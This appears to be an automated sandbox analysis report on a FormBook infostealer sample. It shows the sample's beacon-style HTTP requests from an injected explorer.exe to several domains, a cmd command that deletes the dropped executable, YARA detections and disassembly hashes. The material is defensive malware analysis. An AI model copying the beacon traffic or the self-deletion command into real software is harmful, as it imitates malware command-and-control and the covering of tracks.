                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            4 | 192.168.2.3 | 49811 | 18.118.119.183 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:36.087368965 CEST | 9784 | OUT | GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1
                                            Host: www.sosoon.store
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:36.235888004 CEST | 9786 | IN | HTTP/1.1 404 Not Found
                                            Server: nginx/1.14.1
                                            Date: Wed, 27 Oct 2021 17:14:36 GMT
                                            Content-Type: text/html
                                            Content-Length: 169
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            5 | 192.168.2.3 | 49816 | 108.167.135.122 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:41.554748058 CEST | 9798 | OUT | GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.esyscoloradosprings.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:41.696489096 CEST | 9800 | IN | HTTP/1.1 503 Service Unavailable
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Length: 884
                                            Connection: close
                                            P3P: CP="CAO PSA OUR"
                                            Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                            Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                            Pragma: no-cache
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 
6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            6 | 192.168.2.3 | 49817 | 156.240.150.22 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:52.189634085 CEST | 9801 | OUT | GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1
                                            Host: www.24000words.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:52.424355030 CEST | 9802 | IN | HTTP/1.1 200 OK
                                            Date: Wed, 27 Oct 2021 17:14:52 GMT
                                            Content-Length: 798
                                            Content-Type: text/html
                                            Server: nginx
                                            Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e cb ab d1 bc c9 bd b7 d0 d7 d1 d0 c5 d3 c3 b5 a3 b1 a3 d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 
22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/tj.js"></script><script language="javascript" type="text/javascript" src="/common.js"></script></body></html></html>


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            7 | 192.168.2.3 | 49818 | 172.67.216.2 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:14:57.489799023 CEST | 9802 | OUT | GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1
                                            Host: www.healthyweekendtips.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:14:57.515161991 CEST | 9803 | IN | HTTP/1.1 301 Moved Permanently
                                            Date: Wed, 27 Oct 2021 17:14:57 GMT
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Cache-Control: max-age=3600
                                            Expires: Wed, 27 Oct 2021 18:14:57 GMT
                                            Location: https://www.healthyweekendtips.com/fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+
                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5D1eXR4p2fJe882mIae8SPTGlhe7nnaOlKPFLrQXlzIMhBl9Y%2FnfiBvnR2i5ZMNEaPleGGKb%2BuYs05wAjXEMwI5xNH4xQyLNJJeEBO%2FeE%2FTQqjGhvRUh2brFEu8FMKXOFoyd2sXgHmi4sXOLBQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                            Server: cloudflare
                                            CF-RAY: 6a4d904d5bbb6963-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                            8 | 192.168.2.3 | 49819 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                            Timestamp | kBytes transferred | Direction | Data
                                            Oct 27, 2021 19:15:07.637352943 CEST | 9804 | OUT | GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1
                                            Host: www.thedusi.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Oct 27, 2021 19:15:07.816297054 CEST | 9805 | IN | HTTP/1.1 403 Forbidden
                                            Server: openresty
                                            Date: Wed, 27 Oct 2021 17:15:07 GMT
                                            Content-Type: text/html
                                            Content-Length: 275
                                            ETag: "61797039-113"
                                            Via: 1.1 google
                                            Connection: close
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                            Code Manipulations

                                            Statistics

                                            CPU Usage

                                            Memory Usage

                                            High Level Behavior Distribution

                                            Behavior

                                            System Behavior

                                            General

                                            Start time: 19:13:01
                                            Start date: 27/10/2021
                                            Path: C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit): true
                                            Commandline: 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase: 0x610000
                                            File size: 512000 bytes
                                            MD5 hash: 4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: .Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000002.00000002.296214054.00000000029A1000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation: low

                                            General

                                            Start time: 19:13:03
                                            Start date: 27/10/2021
                                            Path: C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Wow64 process (32bit): true
                                            Commandline: C:\Users\user\Desktop\CtTYTpaAKA.exe
                                            Imagebase: 0x540000
                                            File size: 512000 bytes
                                            MD5 hash: 4A640B5ABFD52DC70EB962BF9F250714
                                            Has elevated privileges: true
                                            Has administrator privileges: true
                                            Programmed in: C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Start time:19:13:06
                                            Start date:27/10/2021
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff720ea0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Start time:19:13:30
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cscript.exe
                                            Imagebase:0x840000
                                            File size:143360 bytes
                                            MD5 hash:00D3041E47F99E48DD5FFFEDF60F6304
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Start time:19:13:34
                                            Start date:27/10/2021
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe'
                                            Imagebase:0xd80000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Start time:19:13:35
                                            Start date:27/10/2021
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7f20f0000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            Code Analysis


                                              Executed Functions

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2e3a1f3a4ada4259f12f7378570b282b1b40730665bb573e6e7110f43f324a72
                                              • Instruction ID: d653cb02f6cc0f09acc3787d0df81290dc4532253b987b6c2b81dc225f37d988
                                              • Opcode Fuzzy Hash: 2e3a1f3a4ada4259f12f7378570b282b1b40730665bb573e6e7110f43f324a72
                                              • Instruction Fuzzy Hash: CF12E7F9C917468BE310CF65E89C288BB61F741328BD04B28C9652AAD5D7BC917ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bd8c82c3e5f54877b0311c21e6f5f2f64ee5605fa745ed8c44ba3665b601f35d
                                              • Instruction ID: 8228fee99c22c624669937226a0b4cedb7270e6d33aef6ed44c269c630eef2a6
                                              • Opcode Fuzzy Hash: bd8c82c3e5f54877b0311c21e6f5f2f64ee5605fa745ed8c44ba3665b601f35d
                                              • Instruction Fuzzy Hash: A8C13CF9C517468BE310DF65E88C189BB61BB85328FD04B28D9612B6D0D7B8947ECF84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f460b9fb08b01fe5ebc4f1906b9248ddd767915eda32d68816dd8ac66b6e325
                                              • Instruction ID: cee3ea05ca7a93f0e12233c4ec992576183f04c4b56b3ad221a41402ada95ae7
                                              • Opcode Fuzzy Hash: 0f460b9fb08b01fe5ebc4f1906b9248ddd767915eda32d68816dd8ac66b6e325
                                              • Instruction Fuzzy Hash: 49C13CF9C917468BE310DF65E88C189BB61BB85328FD04B28D9612B6D0D7B8947ECF44
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 0284BC10
                                              • GetCurrentThread.KERNEL32 ref: 0284BC4D
                                              • GetCurrentProcess.KERNEL32 ref: 0284BC8A
                                              • GetCurrentThreadId.KERNEL32 ref: 0284BCE3
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.296057262.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                              Similarity
                                              • API ID: Current$ProcessThread
                                              • String ID:
                                              • API String ID: 2063062207-0
                                              • Opcode ID: dbbd004a022eb88d65326e2936c28c47a9fd560e0e24404495a3ee62fd5a2c32
                                              • Instruction ID: 0d3e10bc53ccc5381c2ab313ca336dd763864257092e66c9217dfbe8cf62040d
                                              • Opcode Fuzzy Hash: dbbd004a022eb88d65326e2936c28c47a9fd560e0e24404495a3ee62fd5a2c32
                                              • Instruction Fuzzy Hash: 7F5136B8D006498FDB10CFAAC588BDEBBF1BF49308F248459D459A73A0CB749944CF65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 02849AF6
                                              Memory Dump Source
